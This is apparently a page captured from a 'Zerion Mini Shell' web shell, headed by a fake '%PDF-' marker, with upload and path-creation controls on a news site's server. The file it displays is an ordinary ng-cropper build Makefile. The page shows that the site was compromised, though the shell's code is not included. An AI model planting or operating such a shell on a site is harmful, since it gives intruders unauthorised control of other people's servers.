%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/news/public/bower_components/ng-cropper/
Upload File :
Create Path :
Current File : /var/www/html/news/public/bower_components/ng-cropper/Makefile

MINIFY=node_modules/minify/bin/minify.js
CROPPER_JS=bower_components/cropper/dist/cropper.js
CROPPER_CSS=bower_components/cropper/dist/cropper.css
BROWSER=open -a "/Applications/Google Chrome.app"

prep:
	bower install
	npm install

dist: prep
	rm dist/*
	cp ngCropper.js dist/ngCropper.js
	$(MINIFY) dist/ngCropper.js > dist/ngCropper.min.js
	cp $(CROPPER_JS) dist/ngCropper.all.js
	cat ngCropper.js >> dist/ngCropper.all.js
	cp $(CROPPER_CSS) dist/ngCropper.all.css
	$(MINIFY) dist/ngCropper.all.js > dist/ngCropper.all.min.js
	$(MINIFY) dist/ngCropper.all.css > dist/ngCropper.all.min.css

test:
	$(BROWSER) test/index.html

demo:
	$(BROWSER) demo/index.html

.PHONY: prepare dist test demo

Zerion Mini Shell 1.0